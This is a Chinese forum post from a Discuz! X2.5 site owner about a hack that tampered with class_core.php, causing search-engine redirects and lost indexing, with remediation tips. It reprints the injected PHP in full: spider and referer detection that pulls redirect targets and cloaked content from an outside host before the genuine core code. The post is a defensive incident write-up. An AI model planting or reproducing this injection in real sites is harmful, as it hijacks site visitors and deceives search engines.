后果一:
百度等搜索引擎打开网站跳转其他网站
不得不先说 网站是被黑了
百度收录打开网站全部跳转到别人家网站里去了
这是不是人的东西劫持了百度来源跳转到自己的网站
解决方法 修改你的.../source/class/class_core.php 你可以直接下载官方的正确的也可以把他的过来百度来源语句删除 自己看着办吧
后果二:
前天的时候,我有个网站被黑客利用,篡改了一个文件,结果导致在百度昨天的大更中,网站收录降了几千。还有原来是百度秒收的站,现在又不知道要什么时候才会恢复了。
这个文件是:/source/class/class_core.php DZX2.5 中。在被篡改的文件中,给我把网站的所有蜘蛛都给屏蔽了。
昨天,当我发现自己网站15分钟在线人数由平时几百降到几十的时候,我就发现了不对,但是就是自己一直没有找到原因。今天早上site:xxx.com,发现百度的快照,中title中被篡改。
打开源码,完全正常,没有任何问题。没法,后来在后台校对源码,就发现了class_core.php被修改了。
怪就怪自己的网站目录权限没有设置好。不应该在class给写入权限。
以下是被黑客修改过后的源码文件。大家可以看看。
- <?php
- @error_reporting (E_ALL & ~E_NOTICE & ~E_WARNING);
- ini_set(‘display_errors’,0);
- $spider_arr = array(
- ‘baiduspider’,
- ‘baiduspider/2.0′,
- ‘baiducustomer’,
- ‘baidu-thumbnail’,
- ‘baiduspider-mobile-gate’,
- ‘baiduspider-mobile-gate’,
- ‘baidu-transcoder/1.0.6.0′,
- ‘googlebot/2.1′,
- ‘googlebot-image/1.0′,
- ‘feedfetcher-google’,
- ‘mediapartners-google’,
- ‘adsbot-google’,
- ‘googlebot-mobile/2.1′,
- ‘googlefriendconnect/1.0′,
- ‘sosospider’,
- ‘sosoblogspider’,
- ‘sosoimagespider’,
- ‘so** web robot’,
- ‘so** web spider/3.0′,
- ‘so** web spider/4.0′,
- ‘so** head spider/3.0′,
- ‘so**-test-spider/4.0′,
- ‘so** orion spider/4.0′,
- );
- $not_spider_ip_arr = array(
- “222.77.187.33″,
- “125.90.88.96″
- );
- $ref_arr = array(
- ‘baidu.com’,
- ‘google.com’
- );
- $agent = $_SERVER['HTTP_USER_AGENT'];
- $rip = $_SERVER["REMOTE_ADDR"];
- $referer = $_SERVER["HTTP_REFERER"];
- $spider = false;
- foreach($spider_arr as $_spider) {
- if(stripos($agent,$_spider) !== false) {
- $spider = true;
- break;
- }
- }
- if(in_array($rip,$not_spider_ip_arr)) {
- $spider = false;
- }
- $ref = false;
- foreach($ref_arr as $_ref) {
- if(stripos($referer,$_ref) !== false) {
- $ref = true;
- break;
- }
- }
- $query_string=$_SERVER["HTTP_REFERER"];
- function isSpider($v)
- {
- $spiders=array(“baidu.com”,”google.com”,”soso”,”so**”);
- $i=0;
- foreach ($spiders as $i => $value) {
- if(stristr($v,$spiders[$i])){return true;}
- }
- return false;
- }
- if(isSpider($_SERVER['HTTP_REFERER']))
- {
- if(stristr($_SERVER["HTTP_REFERER"],’%d3%c0%ba%e3%d6%ae%cb%fe’)) {
- $url=file_get_contents(‘http://txt.ck777.com:1313/sun/yhzt.txt’);
- Header(“Location:$url”.’?’.$_SERVER['SERVER_NAME']);
- exit;
- }
- }
- if(array_key_exists(‘yhzt’,$_GET)&&$ref) {
- $xt = trim($_GET['yhzt']);
- $url=file_get_contents(‘http://txt.ck777.com:1313/sun/yhzt.txt’);
- Header(“Location:$url”.’?’.$_SERVER['SERVER_NAME']);
- exit;
- }
- if($spider) {
- $cjurl=file_get_contents(‘http://txt.ck777.com:1313/soft/yhzt.txt’);
- echo file_get_contents($cjurl);
- exit;
- }
- ?>
- <?php
- /**
- * [Discuz!] (C)2001-2099 Comsenz Inc.
- * This is NOT a freeware, use is subject to license terms
- *
- * $Id: class_core.php 28824 2012-03-14 06:41:27Z zhangguosheng $
- */
- error_reporting(E_ALL);
- define(‘IN_DISCUZ’, true);
- define(‘DISCUZ_ROOT’, substr(dirname(__FILE__), 0, -12));
- define(‘DISCUZ_CORE_DEBUG’, false);
- set_exception_handler(array(‘core’, ‘handleException’));
- if(DISCUZ_CORE_DEBUG) {
- set_error_handler(array(‘core’, ‘handleError’));
- register_shutdown_function(array(‘core’, ‘handleShutdown’));
- }
- if(function_exists(‘spl_autoload_register’)) {
- spl_autoload_register(array(‘core’, ‘autoload’));
- } else {
- function __autoload($class) {
- return core::autoload($class);
- }
- }
- C::creatapp();
- class core
- {
- private static $_tables;
- private static $_imports;
- private static $_app;
- private static $_memory;
- public static function app() {
- return self::$_app;
- }
- public static function creatapp() {
- if(!is_object(self::$_app)) {
- self::$_app = discuz_application::instance();
- }
- return self::$_app;
- }
- public static function t($name) {
- $pluginid = null;
- if($name[0] === ‘#’) {
- list(, $pluginid, $name) = explode(‘#’, $name);
- }
- $classname = ‘table_’.$name;
- if(!isset(self::$_tables[$classname])) {
- if(!class_exists($classname, false)) {
- self::import(($pluginid ? ‘plugin/’.$pluginid : ‘class’).’/table/’.$name);
- }
- self::$_tables[$classname] = new $classname;
- }
- return self::$_tables[$classname];
- }
- public static function memory() {
- if(!self::$_memory) {
- self::$_memory = new discuz_memory();
- self::$_memory->init(self::app()->config['memory']);
- }
- return self::$_memory;
- }
- public static function import($name, $folder = ”, $force = true) {
- $key = $folder.$name;
- if(!isset(self::$_imports[$key])) {
- $path = DISCUZ_ROOT.’/source/’.$folder;
- if(strpos($name, ‘/’) !== false) {
- $pre = basename(dirname($name));
- $filename = dirname($name).’/’.$pre.’_’.basename($name).’.php’;
- } else {
- $filename = $name.’.php’;
- }
- if(is_file($path.’/’.$filename)) {
- self::$_imports[$key] = true;
- return include $path.’/’.$filename;
- } elseif(!$force) {
- return false;
- } else {
- throw new Exception(‘Oops! System file lost: ‘.$filename);
- }
- }
- return true;
- }
- public static function handleException($exception) {
- discuz_error::exception_error($exception);
- }
- public static function handleError($errno, $errstr, $errfile, $errline) {
- if($errno & DISCUZ_CORE_DEBUG) {
- discuz_error::system_error($errstr, false, true, false);
- }
- }
- public static function handleShutdown() {
- if(($error = error_get_last()) && $error['type'] & DISCUZ_CORE_DEBUG) {
- discuz_error::system_error($error['message'], false, true, false);
- }
- }
- public static function autoload($class) {
- $class = strtolower($class);
- if(strpos($class, ‘_’) !== false) {
- list($folder) = explode(‘_’, $class);
- $file = ‘class/’.$folder.’/’.substr($class, strlen($folder) + 1);
- } else {
- $file = ‘class/’.$class;
- }
- try {
- self::import($file);
- return true;
- } catch (Exception $exc) {
- $trace = $exc->getTrace();
- foreach ($trace as $log) {
- if(empty($log['class']) && $log['function'] == ‘class_exists’) {
- return false;
- }
- }
- discuz_error::exception_error($exc);
- }
- }
- }
- class C extends core {}
- class DB extends discuz_database {}
- ?>
复制代码
因此,大家以后如果发现网站有什么不正常的时候,就多多检查下网站,经常在网站后台校对下文件。官方发布补丁就立刻修补。
|